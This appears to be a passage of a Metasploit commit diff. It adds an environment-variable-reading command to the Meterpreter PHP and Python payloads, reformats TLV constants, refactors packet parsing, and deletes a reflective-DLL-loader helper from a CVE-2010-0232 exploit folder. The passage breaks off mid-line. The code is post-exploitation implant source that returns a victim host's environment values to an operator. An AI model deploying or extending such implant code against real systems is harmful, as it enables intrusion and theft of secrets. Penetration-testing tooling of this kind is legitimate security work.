stdapi_sys_config_getenv($req, &$pkt) { + my_print("doing getenv"); + + $variable_tlvs = packet_get_all_tlvs($req, TLV_TYPE_ENV_VARIABLE); + + # If we decide some day to have sys.config.getenv return all env + # vars when given an empty search list, this is one way to do it. + #if (empty($variable_tlvs)) { + # # We don't have a var to look up, return all of 'em + # $variables = array_keys($_SERVER); + #} else { + # $variables = array(); + # foreach ($variable_tlvs as $tlv) { + # array_push($variables, $tlv['value']); + # } + #} + + foreach ($variable_tlvs as $name) { + $canonical_name = str_replace(array("$","%"), "", $name['value']); + $env = getenv($canonical_name); + if ($env !== FALSE) { + $grp = ""; + $grp .= tlv_pack(create_tlv(TLV_TYPE_ENV_VARIABLE, $canonical_name)); + $grp .= tlv_pack(create_tlv(TLV_TYPE_ENV_VALUE, $env)); + packet_add_tlv($pkt, create_tlv(TLV_TYPE_ENV_GROUP, $grp)); + } + } + + return ERROR_SUCCESS; +} +} + + # Unimplemented becuase it's unimplementable #if (!function_exists('stdapi_sys_config_rev2self')) { #register_command('stdapi_sys_config_rev2self'); @@ -696,24 +739,24 @@ function close_process($proc) { foreach ($proc['pipes'] as $f) { @fclose($f); } - if (is_callable('proc_get_status')) { - $status = proc_get_status($proc['handle']); - } else { - # fake a running process on php < 4.3 - $status = array('running' => true); - } + if (is_callable('proc_get_status')) { + $status = proc_get_status($proc['handle']); + } else { + # fake a running process on php < 4.3 + $status = array('running' => true); + } - # proc_close blocks waiting for the child to exit, so if it's still - # running, don't take a chance on deadlock and just sigkill it if we - # can. We can't on php < 4.3, so don't do anything. This will leave - # zombie processes, but that's better than deadlock. - if ($status['running'] == false) { - proc_close($proc['handle']); - } else { - if (is_callable('proc_terminate')) { - proc_terminate($proc['handle'], 9); - } - } + # proc_close blocks waiting for the child to exit, so if it's still + # running, don't take a chance on deadlock and just sigkill it if we + # can. We can't on php < 4.3, so don't do anything. This will leave + # zombie processes, but that's better than deadlock. + if ($status['running'] == false) { + proc_close($proc['handle']); + } else { + if (is_callable('proc_terminate')) { + proc_terminate($proc['handle'], 9); + } + } if (array_key_exists('cid', $proc) && $channel_process_map[$proc['cid']]) { unset($channel_process_map[$proc['cid']]); } diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py index b64b7278e4..b6bdccd483 100644 --- a/data/meterpreter/ext_server_stdapi.py +++ b/data/meterpreter/ext_server_stdapi.py @@ -86,170 +86,185 @@ TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16) # # TLV Specific Types # -TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0 -TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1 -TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2 -TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3 -TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4 +TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0 +TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1 +TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2 +TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3 +TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4 -TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10 -TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11 -TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12 +TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10 +TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11 +TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12 -TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25 -TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26 -TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27 +TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25 +TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26 +TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27 -TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50 -TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51 -TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52 -TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53 -TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54 +TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50 +TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51 +TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52 +TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53 +TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54 ## # General ## -TLV_TYPE_HANDLE = TLV_META_TYPE_UINT | 600 -TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601 -TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_UINT | 630 -TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_UINT | 631 +TLV_TYPE_HANDLE = TLV_META_TYPE_UINT | 600 +TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601 +TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_UINT | 630 +TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_UINT | 631 ## # Fs ## -TLV_TYPE_DIRECTORY_PATH = TLV_META_TYPE_STRING | 1200 -TLV_TYPE_FILE_NAME = TLV_META_TYPE_STRING | 1201 -TLV_TYPE_FILE_PATH = TLV_META_TYPE_STRING | 1202 -TLV_TYPE_FILE_MODE = TLV_META_TYPE_STRING | 1203 -TLV_TYPE_FILE_SIZE = TLV_META_TYPE_UINT | 1204 +TLV_TYPE_DIRECTORY_PATH = TLV_META_TYPE_STRING | 1200 +TLV_TYPE_FILE_NAME = TLV_META_TYPE_STRING | 1201 +TLV_TYPE_FILE_PATH = TLV_META_TYPE_STRING | 1202 +TLV_TYPE_FILE_MODE = TLV_META_TYPE_STRING | 1203 +TLV_TYPE_FILE_SIZE = TLV_META_TYPE_UINT | 1204 -TLV_TYPE_STAT_BUF = TLV_META_TYPE_COMPLEX | 1220 +TLV_TYPE_STAT_BUF = TLV_META_TYPE_COMPLEX | 1220 -TLV_TYPE_SEARCH_RECURSE = TLV_META_TYPE_BOOL | 1230 -TLV_TYPE_SEARCH_GLOB = TLV_META_TYPE_STRING | 1231 -TLV_TYPE_SEARCH_ROOT = TLV_META_TYPE_STRING | 1232 -TLV_TYPE_SEARCH_RESULTS = TLV_META_TYPE_GROUP | 1233 +TLV_TYPE_SEARCH_RECURSE = TLV_META_TYPE_BOOL | 1230 +TLV_TYPE_SEARCH_GLOB = TLV_META_TYPE_STRING | 1231 +TLV_TYPE_SEARCH_ROOT = TLV_META_TYPE_STRING | 1232 +TLV_TYPE_SEARCH_RESULTS = TLV_META_TYPE_GROUP | 1233 ## # Net ## -TLV_TYPE_HOST_NAME = TLV_META_TYPE_STRING | 1400 -TLV_TYPE_PORT = TLV_META_TYPE_UINT | 1401 +TLV_TYPE_HOST_NAME = TLV_META_TYPE_STRING | 1400 +TLV_TYPE_PORT = TLV_META_TYPE_UINT | 1401 -TLV_TYPE_SUBNET = TLV_META_TYPE_RAW | 1420 -TLV_TYPE_NETMASK = TLV_META_TYPE_RAW | 1421 -TLV_TYPE_GATEWAY = TLV_META_TYPE_RAW | 1422 -TLV_TYPE_NETWORK_ROUTE = TLV_META_TYPE_GROUP | 1423 +TLV_TYPE_SUBNET = TLV_META_TYPE_RAW | 1420 +TLV_TYPE_NETMASK = TLV_META_TYPE_RAW | 1421 +TLV_TYPE_GATEWAY = TLV_META_TYPE_RAW | 1422 +TLV_TYPE_NETWORK_ROUTE = TLV_META_TYPE_GROUP | 1423 -TLV_TYPE_IP = TLV_META_TYPE_RAW | 1430 -TLV_TYPE_MAC_ADDRESS = TLV_META_TYPE_RAW | 1431 -TLV_TYPE_MAC_NAME = TLV_META_TYPE_STRING | 1432 -TLV_TYPE_NETWORK_INTERFACE = TLV_META_TYPE_GROUP | 1433 +TLV_TYPE_IP = TLV_META_TYPE_RAW | 1430 +TLV_TYPE_MAC_ADDRESS = TLV_META_TYPE_RAW | 1431 +TLV_TYPE_MAC_NAME = TLV_META_TYPE_STRING | 1432 +TLV_TYPE_NETWORK_INTERFACE = TLV_META_TYPE_GROUP | 1433 -TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440 -TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441 -TLV_TYPE_GATEWAY_STRING = TLV_META_TYPE_STRING | 1442 -TLV_TYPE_ROUTE_METRIC = TLV_META_TYPE_UINT | 1443 -TLV_TYPE_ADDR_TYPE = TLV_META_TYPE_UINT | 1444 +TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440 +TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441 +TLV_TYPE_GATEWAY_STRING = TLV_META_TYPE_STRING | 1442 +TLV_TYPE_ROUTE_METRIC = TLV_META_TYPE_UINT | 1443 +TLV_TYPE_ADDR_TYPE = TLV_META_TYPE_UINT | 1444 +## # Socket -TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500 -TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501 -TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502 -TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503 -TLV_TYPE_CONNECT_RETRIES = TLV_META_TYPE_UINT | 1504 +## +TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500 +TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501 +TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502 +TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503 +TLV_TYPE_CONNECT_RETRIES = TLV_META_TYPE_UINT | 1504 -TLV_TYPE_SHUTDOWN_HOW = TLV_META_TYPE_UINT | 1530 +TLV_TYPE_SHUTDOWN_HOW = TLV_META_TYPE_UINT | 1530 +## # Registry -TLV_TYPE_HKEY = TLV_META_TYPE_UINT | 1000 -TLV_TYPE_ROOT_KEY = TLV_TYPE_HKEY -TLV_TYPE_BASE_KEY = TLV_META_TYPE_STRING | 1001 -TLV_TYPE_PERMISSION = TLV_META_TYPE_UINT | 1002 -TLV_TYPE_KEY_NAME = TLV_META_TYPE_STRING | 1003 -TLV_TYPE_VALUE_NAME = TLV_META_TYPE_STRING | 1010 -TLV_TYPE_VALUE_TYPE = TLV_META_TYPE_UINT | 1011 -TLV_TYPE_VALUE_DATA = TLV_META_TYPE_RAW | 1012 -TLV_TYPE_TARGET_HOST = TLV_META_TYPE_STRING | 1013 +## +TLV_TYPE_HKEY = TLV_META_TYPE_UINT | 1000 +TLV_TYPE_ROOT_KEY = TLV_TYPE_HKEY +TLV_TYPE_BASE_KEY = TLV_META_TYPE_STRING | 1001 +TLV_TYPE_PERMISSION = TLV_META_TYPE_UINT | 1002 +TLV_TYPE_KEY_NAME = TLV_META_TYPE_STRING | 1003 +TLV_TYPE_VALUE_NAME = TLV_META_TYPE_STRING | 1010 +TLV_TYPE_VALUE_TYPE = TLV_META_TYPE_UINT | 1011 +TLV_TYPE_VALUE_DATA = TLV_META_TYPE_RAW | 1012 +TLV_TYPE_TARGET_HOST = TLV_META_TYPE_STRING | 1013 +## # Config -TLV_TYPE_COMPUTER_NAME = TLV_META_TYPE_STRING | 1040 -TLV_TYPE_OS_NAME = TLV_META_TYPE_STRING | 1041 -TLV_TYPE_USER_NAME = TLV_META_TYPE_STRING | 1042 -TLV_TYPE_ARCHITECTURE = TLV_META_TYPE_STRING | 1043 +## +TLV_TYPE_COMPUTER_NAME = TLV_META_TYPE_STRING | 1040 +TLV_TYPE_OS_NAME = TLV_META_TYPE_STRING | 1041 +TLV_TYPE_USER_NAME = TLV_META_TYPE_STRING | 1042 +TLV_TYPE_ARCHITECTURE = TLV_META_TYPE_STRING | 1043 + +## +# Environment +## +TLV_TYPE_ENV_VARIABLE = TLV_META_TYPE_STRING | 1100 +TLV_TYPE_ENV_VALUE = TLV_META_TYPE_STRING | 1101 +TLV_TYPE_ENV_GROUP = TLV_META_TYPE_GROUP | 1102 DELETE_KEY_FLAG_RECURSIVE = (1 << 0) +## # Process -TLV_TYPE_BASE_ADDRESS = TLV_META_TYPE_UINT | 2000 -TLV_TYPE_ALLOCATION_TYPE = TLV_META_TYPE_UINT | 2001 -TLV_TYPE_PROTECTION = TLV_META_TYPE_UINT | 2002 -TLV_TYPE_PROCESS_PERMS = TLV_META_TYPE_UINT | 2003 -TLV_TYPE_PROCESS_MEMORY = TLV_META_TYPE_RAW | 2004 -TLV_TYPE_ALLOC_BASE_ADDRESS = TLV_META_TYPE_UINT | 2005 -TLV_TYPE_MEMORY_STATE = TLV_META_TYPE_UINT | 2006 -TLV_TYPE_MEMORY_TYPE = TLV_META_TYPE_UINT | 2007 -TLV_TYPE_ALLOC_PROTECTION = TLV_META_TYPE_UINT | 2008 -TLV_TYPE_PID = TLV_META_TYPE_UINT | 2300 -TLV_TYPE_PROCESS_NAME = TLV_META_TYPE_STRING | 2301 -TLV_TYPE_PROCESS_PATH = TLV_META_TYPE_STRING | 2302 -TLV_TYPE_PROCESS_GROUP = TLV_META_TYPE_GROUP | 2303 -TLV_TYPE_PROCESS_FLAGS = TLV_META_TYPE_UINT | 2304 -TLV_TYPE_PROCESS_ARGUMENTS = TLV_META_TYPE_STRING | 2305 -TLV_TYPE_PROCESS_ARCH = TLV_META_TYPE_UINT | 2306 -TLV_TYPE_PARENT_PID = TLV_META_TYPE_UINT | 2307 +## +TLV_TYPE_BASE_ADDRESS = TLV_META_TYPE_UINT | 2000 +TLV_TYPE_ALLOCATION_TYPE = TLV_META_TYPE_UINT | 2001 +TLV_TYPE_PROTECTION = TLV_META_TYPE_UINT | 2002 +TLV_TYPE_PROCESS_PERMS = TLV_META_TYPE_UINT | 2003 +TLV_TYPE_PROCESS_MEMORY = TLV_META_TYPE_RAW | 2004 +TLV_TYPE_ALLOC_BASE_ADDRESS = TLV_META_TYPE_UINT | 2005 +TLV_TYPE_MEMORY_STATE = TLV_META_TYPE_UINT | 2006 +TLV_TYPE_MEMORY_TYPE = TLV_META_TYPE_UINT | 2007 +TLV_TYPE_ALLOC_PROTECTION = TLV_META_TYPE_UINT | 2008 +TLV_TYPE_PID = TLV_META_TYPE_UINT | 2300 +TLV_TYPE_PROCESS_NAME = TLV_META_TYPE_STRING | 2301 +TLV_TYPE_PROCESS_PATH = TLV_META_TYPE_STRING | 2302 +TLV_TYPE_PROCESS_GROUP = TLV_META_TYPE_GROUP | 2303 +TLV_TYPE_PROCESS_FLAGS = TLV_META_TYPE_UINT | 2304 +TLV_TYPE_PROCESS_ARGUMENTS = TLV_META_TYPE_STRING | 2305 +TLV_TYPE_PROCESS_ARCH = TLV_META_TYPE_UINT | 2306 +TLV_TYPE_PARENT_PID = TLV_META_TYPE_UINT | 2307 -TLV_TYPE_IMAGE_FILE = TLV_META_TYPE_STRING | 2400 -TLV_TYPE_IMAGE_FILE_PATH = TLV_META_TYPE_STRING | 2401 -TLV_TYPE_PROCEDURE_NAME = TLV_META_TYPE_STRING | 2402 -TLV_TYPE_PROCEDURE_ADDRESS = TLV_META_TYPE_UINT | 2403 -TLV_TYPE_IMAGE_BASE = TLV_META_TYPE_UINT | 2404 -TLV_TYPE_IMAGE_GROUP = TLV_META_TYPE_GROUP | 2405 -TLV_TYPE_IMAGE_NAME = TLV_META_TYPE_STRING | 2406 +TLV_TYPE_IMAGE_FILE = TLV_META_TYPE_STRING | 2400 +TLV_TYPE_IMAGE_FILE_PATH = TLV_META_TYPE_STRING | 2401 +TLV_TYPE_PROCEDURE_NAME = TLV_META_TYPE_STRING | 2402 +TLV_TYPE_PROCEDURE_ADDRESS = TLV_META_TYPE_UINT | 2403 +TLV_TYPE_IMAGE_BASE = TLV_META_TYPE_UINT | 2404 +TLV_TYPE_IMAGE_GROUP = TLV_META_TYPE_GROUP | 2405 +TLV_TYPE_IMAGE_NAME = TLV_META_TYPE_STRING | 2406 -TLV_TYPE_THREAD_ID = TLV_META_TYPE_UINT | 2500 -TLV_TYPE_THREAD_PERMS = TLV_META_TYPE_UINT | 2502 -TLV_TYPE_EXIT_CODE = TLV_META_TYPE_UINT | 2510 -TLV_TYPE_ENTRY_POINT = TLV_META_TYPE_UINT | 2511 -TLV_TYPE_ENTRY_PARAMETER = TLV_META_TYPE_UINT | 2512 -TLV_TYPE_CREATION_FLAGS = TLV_META_TYPE_UINT | 2513 +TLV_TYPE_THREAD_ID = TLV_META_TYPE_UINT | 2500 +TLV_TYPE_THREAD_PERMS = TLV_META_TYPE_UINT | 2502 +TLV_TYPE_EXIT_CODE = TLV_META_TYPE_UINT | 2510 +TLV_TYPE_ENTRY_POINT = TLV_META_TYPE_UINT | 2511 +TLV_TYPE_ENTRY_PARAMETER = TLV_META_TYPE_UINT | 2512 +TLV_TYPE_CREATION_FLAGS = TLV_META_TYPE_UINT | 2513 -TLV_TYPE_REGISTER_NAME = TLV_META_TYPE_STRING | 2540 -TLV_TYPE_REGISTER_SIZE = TLV_META_TYPE_UINT | 2541 -TLV_TYPE_REGISTER_VALUE_32 = TLV_META_TYPE_UINT | 2542 -TLV_TYPE_REGISTER = TLV_META_TYPE_GROUP | 2550 +TLV_TYPE_REGISTER_NAME = TLV_META_TYPE_STRING | 2540 +TLV_TYPE_REGISTER_SIZE = TLV_META_TYPE_UINT | 2541 +TLV_TYPE_REGISTER_VALUE_32 = TLV_META_TYPE_UINT | 2542 +TLV_TYPE_REGISTER = TLV_META_TYPE_GROUP | 2550 ## # Ui ## -TLV_TYPE_IDLE_TIME = TLV_META_TYPE_UINT | 3000 -TLV_TYPE_KEYS_DUMP = TLV_META_TYPE_STRING | 3001 -TLV_TYPE_DESKTOP = TLV_META_TYPE_STRING | 3002 +TLV_TYPE_IDLE_TIME = TLV_META_TYPE_UINT | 3000 +TLV_TYPE_KEYS_DUMP = TLV_META_TYPE_STRING | 3001 +TLV_TYPE_DESKTOP = TLV_META_TYPE_STRING | 3002 ## # Event Log ## -TLV_TYPE_EVENT_SOURCENAME = TLV_META_TYPE_STRING | 4000 -TLV_TYPE_EVENT_HANDLE = TLV_META_TYPE_UINT | 4001 -TLV_TYPE_EVENT_NUMRECORDS = TLV_META_TYPE_UINT | 4002 +TLV_TYPE_EVENT_SOURCENAME = TLV_META_TYPE_STRING | 4000 +TLV_TYPE_EVENT_HANDLE = TLV_META_TYPE_UINT | 4001 +TLV_TYPE_EVENT_NUMRECORDS = TLV_META_TYPE_UINT | 4002 -TLV_TYPE_EVENT_READFLAGS = TLV_META_TYPE_UINT | 4003 -TLV_TYPE_EVENT_RECORDOFFSET = TLV_META_TYPE_UINT | 4004 +TLV_TYPE_EVENT_READFLAGS = TLV_META_TYPE_UINT | 4003 +TLV_TYPE_EVENT_RECORDOFFSET = TLV_META_TYPE_UINT | 4004 -TLV_TYPE_EVENT_RECORDNUMBER = TLV_META_TYPE_UINT | 4006 -TLV_TYPE_EVENT_TIMEGENERATED = TLV_META_TYPE_UINT | 4007 -TLV_TYPE_EVENT_TIMEWRITTEN = TLV_META_TYPE_UINT | 4008 -TLV_TYPE_EVENT_ID = TLV_META_TYPE_UINT | 4009 -TLV_TYPE_EVENT_TYPE = TLV_META_TYPE_UINT | 4010 -TLV_TYPE_EVENT_CATEGORY = TLV_META_TYPE_UINT | 4011 -TLV_TYPE_EVENT_STRING = TLV_META_TYPE_STRING | 4012 -TLV_TYPE_EVENT_DATA = TLV_META_TYPE_RAW | 4013 +TLV_TYPE_EVENT_RECORDNUMBER = TLV_META_TYPE_UINT | 4006 +TLV_TYPE_EVENT_TIMEGENERATED = TLV_META_TYPE_UINT | 4007 +TLV_TYPE_EVENT_TIMEWRITTEN = TLV_META_TYPE_UINT | 4008 +TLV_TYPE_EVENT_ID = TLV_META_TYPE_UINT | 4009 +TLV_TYPE_EVENT_TYPE = TLV_META_TYPE_UINT | 4010 +TLV_TYPE_EVENT_CATEGORY = TLV_META_TYPE_UINT | 4011 +TLV_TYPE_EVENT_STRING = TLV_META_TYPE_STRING | 4012 +TLV_TYPE_EVENT_DATA = TLV_META_TYPE_RAW | 4013 ## # Power ## -TLV_TYPE_POWER_FLAGS = TLV_META_TYPE_UINT | 4100 -TLV_TYPE_POWER_REASON = TLV_META_TYPE_UINT | 4101 +TLV_TYPE_POWER_FLAGS = TLV_META_TYPE_UINT | 4100 +TLV_TYPE_POWER_REASON = TLV_META_TYPE_UINT | 4101 ## # Sys @@ -367,6 +382,18 @@ def stdapi_sys_config_getuid(request, response): response += tlv_pack(TLV_TYPE_USER_NAME, getpass.getuser()) return ERROR_SUCCESS, response +@meterpreter.register_function +def stdapi_sys_config_getenv(request, response): + for env_var in packet_enum_tlvs(request, TLV_TYPE_ENV_VARIABLE): + pgroup = '' + env_var = env_var['value'].translate(None, '%$') + env_val = os.environ.get(env_var) + if env_val: + pgroup += tlv_pack(TLV_TYPE_ENV_VARIABLE, env_var) + pgroup += tlv_pack(TLV_TYPE_ENV_VALUE, env_val) + response += tlv_pack(TLV_TYPE_ENV_GROUP, pgroup) + return ERROR_SUCCESS, response + @meterpreter.register_function def stdapi_sys_config_sysinfo(request, response): uname_info = platform.uname() diff --git a/data/meterpreter/ext_server_stdapi.x64.dll b/data/meterpreter/ext_server_stdapi.x64.dll index 56eedf98f0..8c539121e9 100755 Binary files a/data/meterpreter/ext_server_stdapi.x64.dll and b/data/meterpreter/ext_server_stdapi.x64.dll differ diff --git a/data/meterpreter/ext_server_stdapi.x86.dll b/data/meterpreter/ext_server_stdapi.x86.dll index f013ccfc5e..0aa9e3f520 100755 Binary files a/data/meterpreter/ext_server_stdapi.x86.dll and b/data/meterpreter/ext_server_stdapi.x86.dll differ diff --git a/data/meterpreter/meterpreter.php b/data/meterpreter/meterpreter.php index f378732436..c33885d901 100755 --- a/data/meterpreter/meterpreter.php +++ b/data/meterpreter/meterpreter.php @@ -680,6 +680,30 @@ function tlv_pack($tlv) { return $ret; } +function tlv_unpack($raw_tlv) { + $tlv = unpack("Nlen/Ntype", substr($raw_tlv, 0, 8)); + $type = $tlv['type']; + my_print("len: {$tlv['len']}, type: {$tlv['type']}"); + if (($type & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) { + $tlv = unpack("Nlen/Ntype/a*value", substr($raw_tlv, 0, $tlv['len'])); + } + elseif (($type & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) { + $tlv = unpack("Nlen/Ntype/Nvalue", substr($raw_tlv, 0, $tlv['len'])); + } + elseif (($type & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) { + $tlv = unpack("Nlen/Ntype/cvalue", substr($raw_tlv, 0, $tlv['len'])); + } + elseif (($type & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW) { + $tlv = unpack("Nlen/Ntype", $raw_tlv); + $tlv['value'] = substr($raw_tlv, 8, $tlv['len']-8); + } + else { + my_print("Wtf type is this? $type"); + $tlv = null; + } + return $tlv; +} + function packet_add_tlv(&$pkt, $tlv) { $pkt .= tlv_pack($tlv); } @@ -689,27 +713,10 @@ function packet_get_tlv($pkt, $type) { # Start at offset 8 to skip past the packet header $offset = 8; while ($offset < strlen($pkt)) { - $tlv = unpack("Nlen/Ntype", substr($pkt, $offset, 8)); + $tlv = tlv_unpack(substr($pkt, $offset)); #my_print("len: {$tlv['len']}, type: {$tlv['type']}"); if ($type == ($tlv['type'] & ~TLV_META_TYPE_COMPRESSED)) { #my_print("Found one at offset $offset"); - if (($type & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) { - $tlv = unpack("Nlen/Ntype/a*value", substr($pkt, $offset, $tlv['len'])); - } - elseif (($type & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) { - $tlv = unpack("Nlen/Ntype/Nvalue", substr($pkt, $offset, $tlv['len'])); - } - elseif (($type & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) { - $tlv = unpack("Nlen/Ntype/cvalue", substr($pkt, $offset, $tlv['len'])); - } - elseif (($type & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW) { - $tlv = unpack("Nlen/Ntype", substr($pkt, $offset, 8)); - $tlv['value'] = substr($pkt, $offset+8, $tlv['len']-8); - } - else { - my_print("Wtf type is this? $type"); - $tlv = null; - } return $tlv; } $offset += $tlv['len']; @@ -719,6 +726,27 @@ function packet_get_tlv($pkt, $type) { } +function packet_get_all_tlvs($pkt, $type) { + my_print("Looking for all tlvs of type $type"); + # Start at offset 8 to skip past the packet header + $offset = 8; + $all = array(); + while ($offset < strlen($pkt)) { + $tlv = tlv_unpack(substr($pkt, $offset)); + if ($tlv == NULL) { + break; + } + my_print("len: {$tlv['len']}, type: {$tlv['type']}"); + if (empty($type) || $type == ($tlv['type'] & ~TLV_META_TYPE_COMPRESSED)) { + my_print("Found one at offset $offset"); + array_push($all, $tlv); + } + $offset += $tlv['len']; + } + return $all; +} + + ## # Functions for genericizing the stream/socket conundrum ## diff --git a/data/meterpreter/metsrv.x64.dll b/data/meterpreter/metsrv.x64.dll index 9068259a47..6dc9743a18 100755 Binary files a/data/meterpreter/metsrv.x64.dll and b/data/meterpreter/metsrv.x64.dll differ diff --git a/data/meterpreter/metsrv.x86.dll b/data/meterpreter/metsrv.x86.dll index 91f367cd7e..aeb272a4b6 100755 Binary files a/data/meterpreter/metsrv.x86.dll and b/data/meterpreter/metsrv.x86.dll differ diff --git a/data/meterpreter/screenshot.x64.dll b/data/meterpreter/screenshot.x64.dll index c192eb02b4..5b95b74cd4 100755 Binary files a/data/meterpreter/screenshot.x64.dll and b/data/meterpreter/screenshot.x64.dll differ diff --git a/data/meterpreter/screenshot.x86.dll b/data/meterpreter/screenshot.x86.dll index ac20375a8d..1b47d33810 100755 Binary files a/data/meterpreter/screenshot.x86.dll and b/data/meterpreter/screenshot.x86.dll differ diff --git a/external/source/ReflectiveDLLInjection b/external/source/ReflectiveDLLInjection new file mode 160000 index 0000000000..88e8e5f109 --- /dev/null +++ b/external/source/ReflectiveDLLInjection @@ -0,0 +1 @@ +Subproject commit 88e8e5f109793f09b35cb17a621f33647d644103 diff --git a/external/source/ReflectiveDllInjection_v1.0.zip b/external/source/ReflectiveDllInjection_v1.0.zip deleted file mode 100644 index 883acde770..0000000000 Binary files a/external/source/ReflectiveDllInjection_v1.0.zip and /dev/null differ diff --git a/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.c b/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.c deleted file mode 100644 index a88d1d946e..0000000000 --- a/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.c +++ /dev/null @@ -1,116 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#include "GetProcAddressR.h" -//===============================================================================================// -// We implement a minimal GetProcAddress to avoid using the native kernel32!GetProcAddress which -// wont be able to resolve exported addresses in reflectivly loaded librarys. -FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName ) -{ - UINT_PTR uiLibraryAddress = 0; - FARPROC fpResult = NULL; - - if( hModule == NULL ) - return NULL; - - // a module handle is really its base address - uiLibraryAddress = (UINT_PTR)hModule; - - __try - { - UINT_PTR uiAddressArray = 0; - UINT_PTR uiNameArray = 0; - UINT_PTR uiNameOrdinals = 0; - PIMAGE_NT_HEADERS pNtHeaders = NULL; - PIMAGE_DATA_DIRECTORY pDataDirectory = NULL; - PIMAGE_EXPORT_DIRECTORY pExportDirectory = NULL; - - // get the VA of the modules NT Header - pNtHeaders = (PIMAGE_NT_HEADERS)(uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew); - - pDataDirectory = (PIMAGE_DATA_DIRECTORY)&pNtHeaders->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - pExportDirectory = 